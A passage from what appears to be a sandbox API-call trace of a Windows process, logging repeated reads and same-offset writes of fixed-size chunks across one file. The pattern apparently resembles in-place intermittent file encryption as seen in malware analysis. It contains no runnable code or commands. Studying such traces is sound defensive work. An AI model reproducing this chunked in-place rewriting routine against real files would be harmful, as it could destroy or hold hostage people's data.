returned 1 [0117.033] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x40d9900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.033] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.034] GetProcessHeap () returned 0x500000 [0117.034] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.034] GetProcessHeap () returned 0x500000 [0117.034] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.034] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4116990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.034] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.055] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4116990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.055] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.056] GetProcessHeap () returned 0x500000 [0117.056] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.056] GetProcessHeap () returned 0x500000 [0117.056] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.056] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4153a20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.056] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.066] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4153a20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.066] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.066] GetProcessHeap () returned 0x500000 [0117.067] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.067] GetProcessHeap () returned 0x500000 [0117.067] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.067] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4190ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.067] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.078] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4190ab0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.078] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.078] GetProcessHeap () returned 0x500000 [0117.078] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.078] GetProcessHeap () returned 0x500000 [0117.078] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.078] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x41cdb40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.079] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.111] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x41cdb40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.111] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.112] GetProcessHeap () returned 0x500000 [0117.112] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.112] GetProcessHeap () returned 0x500000 [0117.112] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.112] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x420abd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.112] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.128] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x420abd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.128] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.128] GetProcessHeap () returned 0x500000 [0117.128] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.128] GetProcessHeap () returned 0x500000 [0117.128] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.128] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4247c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.128] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.154] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4247c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.154] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.155] GetProcessHeap () returned 0x500000 [0117.155] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.155] GetProcessHeap () returned 0x500000 [0117.155] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.155] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4284cf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.155] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.162] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4284cf0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.162] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.163] GetProcessHeap () returned 0x500000 [0117.163] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.163] GetProcessHeap () returned 0x500000 [0117.163] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.163] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x42c1d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.163] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.171] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x42c1d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.171] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.172] GetProcessHeap () returned 0x500000 [0117.172] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.172] GetProcessHeap () returned 0x500000 [0117.172] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.172] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x42fee10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.172] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.186] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x42fee10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.186] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.187] GetProcessHeap () returned 0x500000 [0117.187] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.187] GetProcessHeap () returned 0x500000 [0117.187] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.187] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x433bea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.187] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.195] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x433bea0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.195] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.195] GetProcessHeap () returned 0x500000 [0117.196] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.196] GetProcessHeap () returned 0x500000 [0117.196] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.196] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4378f30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.196] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.203] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4378f30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.204] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.204] GetProcessHeap () returned 0x500000 [0117.204] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.204] GetProcessHeap () returned 0x500000 [0117.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.204] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x43b5fc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.204] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.220] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x43b5fc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.220] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.221] GetProcessHeap () returned 0x500000 [0117.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.221] GetProcessHeap () returned 0x500000 [0117.221] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.221] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x43f3050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.221] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.241] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x43f3050, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.242] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.242] GetProcessHeap () returned 0x500000 [0117.242] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.242] GetProcessHeap () returned 0x500000 [0117.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.242] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44300e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.242] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.256] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44300e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.256] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.257] GetProcessHeap () returned 0x500000 [0117.257] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.257] GetProcessHeap () returned 0x500000 [0117.257] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.257] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x446d170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.257] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.266] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x446d170, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.266] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.266] GetProcessHeap () returned 0x500000 [0117.266] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.266] GetProcessHeap () returned 0x500000 [0117.266] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.267] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44aa200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.267] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.277] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44aa200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.277] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.277] GetProcessHeap () returned 0x500000 [0117.277] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.278] GetProcessHeap () returned 0x500000 [0117.278] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.278] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44e7290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.278] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.293] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x44e7290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.293] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.294] GetProcessHeap () returned 0x500000 [0117.294] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.294] GetProcessHeap () returned 0x500000 [0117.294] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.294] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4524320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.294] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.302] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4524320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.302] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.303] GetProcessHeap () returned 0x500000 [0117.303] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.303] GetProcessHeap () returned 0x500000 [0117.303] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.303] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x45613b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.303] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.311] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x45613b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.311] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.312] GetProcessHeap () returned 0x500000 [0117.312] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.312] GetProcessHeap () returned 0x500000 [0117.312] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.312] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x459e440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.312] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.325] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x459e440, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.325] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.325] GetProcessHeap () returned 0x500000 [0117.325] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.325] GetProcessHeap () returned 0x500000 [0117.325] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.325] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x45db4d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.325] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.336] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x45db4d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.336] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.338] GetProcessHeap () returned 0x500000 [0117.338] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.338] GetProcessHeap () returned 0x500000 [0117.338] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.338] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4618560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.339] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0117.354] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x4618560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.354] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0117.354] GetProcessHeap () returned 0x500000 [0117.354] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0117.354] GetProcessHeap () returned 0x500000 [0117.354] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0117.354] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x46555f0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.354] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: 